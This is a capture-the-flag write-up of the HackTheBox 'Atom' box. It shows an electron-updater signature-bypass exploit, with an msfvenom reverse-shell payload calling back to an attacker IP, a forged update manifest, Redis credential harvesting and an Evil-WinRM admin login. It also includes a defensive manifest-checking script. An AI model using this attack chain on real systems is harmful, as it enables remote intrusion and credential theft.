Enumerating the open SMB share shows one interesting PDF file (the client1, client2 and client3 directories were empty):
smbclient \\\\10.10.10.237\\software_updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 20 20:03:50 2021
.. D 0 Tue Apr 20 20:03:50 2021
client1 D 0 Tue Apr 20 20:03:50 2021
client2 D 0 Tue Apr 20 20:03:50 2021
client3 D 0 Tue Apr 20 20:03:50 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
4413951 blocks of size 4096. 1358229 blocks available
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (537.1 KiloBytes/sec) (average 537.1 KiloBytes/sec)
The exploit uses a remote code execution vulnerability in the Electron updater (an update signature bypass). The Doyensec article describing it is well worth reading: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
Generate the reverse shell payload with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=8989 -f exe -o "r'rs.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: r'rs.exe
Generate the SHA-512 hash of the payload as base64 of the raw digest, the form that latest.yml carries:
shasum -a 512 "r'rs.exe" | cut -d " " -f1 | xxd -r -p | base64
MH1lQ4zN7xIBVAEjuHzNep+75FL5CK+1y7pTo6IrQKFyouvMGwMY/6F6EF6bJUG+D+O5lD6DVBkMitYtZwLi4A==
Upload the latest.yml file via smbclient:
smbclient \\\\10.10.10.237\\software_updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (3.4 kb/s) (average 3.4 kb/s)
smb: \client1\> dir
. D 0 Tue Apr 20 19:43:54 2021
.. D 0 Tue Apr 20 19:43:54 2021
latest.yml A 161 Tue Apr 20 19:43:54 2021
4413951 blocks of size 4096. 1358302 blocks available
smb: \client1\>
Host the binary with Python's SimpleHTTPServer:
python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 ...
Use Netcat to catch the reverse shell:
nc -nvlp 8989
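An added example (not from the original write-up): a small Python checker that computes the sha512 field the way the page's shasum | xxd | base64 pipeline does, parses a latest.yml manifest, and shows why an update should be rejected both when the digest does not match and when the filename carries a quote character like the page's r'rs.exe. The manifest and binary are constructed; check_update is a hypothetical helper, not electron-updater's own code.

```python
import base64
import hashlib
import re

# Digest exactly as the page's pipeline computes it:
#   shasum -a 512 FILE | cut -d " " -f1 | xxd -r -p | base64
# i.e. base64 of the raw SHA-512 digest, the sha512 field the updater reads from latest.yml.
def sha512_b64(data: bytes) -> str:
    return base64.b64encode(hashlib.sha512(data).digest()).decode()

# Minimal parser for the flat "key: value" lines of a latest.yml (no PyYAML needed).
def parse_latest_yml(text: str) -> dict:
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z0-9_]+):\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

# Characters that should never appear in an update filename. The page's payload is named
# r'rs.exe; the linked Doyensec write-up explains how a single quote in the name breaks the
# quoted PowerShell signature check in vulnerable electron-updater versions.
UNSAFE_PATH_CHARS = set("'\"`$;&|<>\\/")

# Hypothetical checker: returns (accepted, reason). Rejects a manifest/path mismatch,
# unsafe filename characters, and a digest that does not match the downloaded bytes.
def check_update(manifest: str, downloaded_name: str, downloaded: bytes) -> tuple:
    fields = parse_latest_yml(manifest)
    if fields.get("path") != downloaded_name:
        return False, "path in latest.yml does not match downloaded file"
    if any(c in UNSAFE_PATH_CHARS for c in downloaded_name):
        return False, "unsafe character in update filename"
    if fields.get("sha512") != sha512_b64(downloaded):
        return False, "sha512 mismatch"
    # A matching hash proves integrity only: latest.yml arrives over the same channel as the
    # binary, so authenticity still depends on the code-signature check that was bypassed here.
    return True, "sha512 matches; signature verification still required"

# Constructed sample: a fake update binary and a manifest written for it.
FAKE_UPDATE = b"MZ constructed fake update binary, not a real PE"
QUOTE_MANIFEST = (
    "version: 1.2.3\n"
    "path: r'rs.exe\n"
    f"sha512: {sha512_b64(FAKE_UPDATE)}\n"
    "releaseDate: '2021-04-20T19:43:54.000Z'\n"
)
BENIGN_MANIFEST = QUOTE_MANIFEST.replace("r'rs.exe", "update.exe")

if __name__ == "__main__":
    print(check_update(QUOTE_MANIFEST, "r'rs.exe", FAKE_UPDATE))          # rejected: unsafe character
    print(check_update(BENIGN_MANIFEST, "update.exe", FAKE_UPDATE))        # accepted: hash matches
    print(check_update(BENIGN_MANIFEST, "update.exe", FAKE_UPDATE + b"x")) # rejected: sha512 mismatch
```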
The SimpleHTTPServer log shows the target fetching the payload (it first asks for a .blockmap, which does not exist, then downloads the .exe):
10.10.10.237 - - [20/Apr/2021 19:43:55] code 404, message File not found
10.10.10.237 - - [20/Apr/2021 19:43:55] "GET /exploit/r%27rs.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [20/Apr/2021 19:43:55] "GET /exploit/r%27rs.exe HTTP/1.1" 200 -
And looking back at Netcat, we’ve caught the shell:
[*] Command shell session 1 opened (10.10.14.51:8989 -> 10.10.10.237:52760) at 2021-04-20
nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.237] 52818
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jason
C:\WINDOWS\system32>cd C:\Users\Jason\Desktop
cd C:\Users\Jason\Desktop
C:\Users\jason\Desktop>type user.txt
type user.txt
fd-----------------------------d8
Root Enumeration
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\
12/07/2019 02:14 AM <DIR> PerfLogs
04/09/2021 04:23 AM <DIR> Program Files
11/19/2020 12:42 AM <DIR> Program Files (x86)
04/25/2021 04:51 PM <DIR> Software_Updates
04/01/2021 03:53 AM <DIR> Users
04/24/2021 06:04 AM <DIR> Windows
03/31/2021 08:00 AM <DIR> xampp
0 File(s) 0 bytes
7 Dir(s) 5,375,549,440 bytes free
C:\>cd xampp
cd xampp
Access is denied.
C:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files
04/09/2021 04:23 AM <DIR> .
04/09/2021 04:23 AM <DIR> ..
04/01/2021 04:50 AM <DIR> Common Files
03/31/2021 12:49 PM <DIR> CUAssistant
12/07/2019 02:50 AM <DIR> Internet Explorer
04/02/2021 07:38 PM <DIR> Microsoft Update Health Tools
12/07/2019 02:14 AM <DIR> ModifiableWindowsApps
03/31/2021 02:35 AM <DIR> nodejs
04/24/2021 06:05 AM <DIR> Redis
04/01/2021 07:49 PM <DIR> rempl
04/09/2021 04:23 AM <DIR> VMware
04/02/2021 07:52 PM <DIR> Windows Defender
04/04/2021 09:22 PM <DIR> Windows Defender Advanced Threat Protection
04/02/2021 07:52 PM <DIR> Windows Mail
04/02/2021 07:52 PM <DIR> Windows Media Player
12/07/2019 02:52 AM <DIR> Windows Multimedia Platform
12/07/2019 02:49 AM <DIR> Windows NT
04/02/2021 07:52 PM <DIR> Windows Photo Viewer
12/07/2019 02:52 AM <DIR> Windows Portable Devices
12/07/2019 02:31 AM <DIR> Windows Security
12/07/2019 02:31 AM <DIR> WindowsPowerShell
C:\Program Files\Redis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files\Redis
04/24/2021 06:05 AM <DIR> .
04/24/2021 06:05 AM <DIR> ..
07/01/2016 03:54 PM 1,024 EventLog.dll
04/02/2021 07:31 AM <DIR> Logs
07/01/2016 03:52 PM 12,618 Redis on Windows Release Notes.docx
07/01/2016 03:52 PM 16,769 Redis on Windows.docx
07/01/2016 03:55 PM 406,016 redis-benchmark.exe
07/01/2016 03:55 PM 4,370,432 redis-benchmark.pdb
07/01/2016 03:55 PM 257,024 redis-check-aof.exe
07/01/2016 03:55 PM 3,518,464 redis-check-aof.pdb
07/01/2016 03:55 PM 268,288 redis-check-dump.exe
07/01/2016 03:55 PM 3,485,696 redis-check-dump.pdb
07/01/2016 03:55 PM 482,304 redis-cli.exe
07/01/2016 03:55 PM 4,517,888 redis-cli.pdb
07/01/2016 03:55 PM 1,553,408 redis-server.exe
07/01/2016 03:55 PM 6,909,952 redis-server.pdb
04/02/2021 07:39 AM 43,962 redis.windows-service.conf
04/02/2021 07:37 AM 43,960 redis.windows.conf
07/01/2016 09:17 AM 14,265 Windows Service Documentation.docx
16 File(s) 25,902,070 bytes
3 Dir(s) 5,376,745,472 bytes free
C:\Program Files\Redis>type redis.windows.conf
type redis.windows.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
Authenticating to Redis on atom.htb:6379 with that password and listing the keys:
atom.htb:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:ids:User"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
atom.htb:6379> get "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
Log in as Administrator with Evil-WinRM:
┌──(kali㉿kali)-[~/Desktop/HackTheBox/Atom/exploit]
└─$ evil-winrm -i 10.10.10.237 -u administrator -p 'kidvscat_admin_@123'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2021 8:22 PM 608 dump.rdb
-a---- 4/2/2021 10:49 PM 204 run.bat
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2021 6:05 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
42----------------------------c2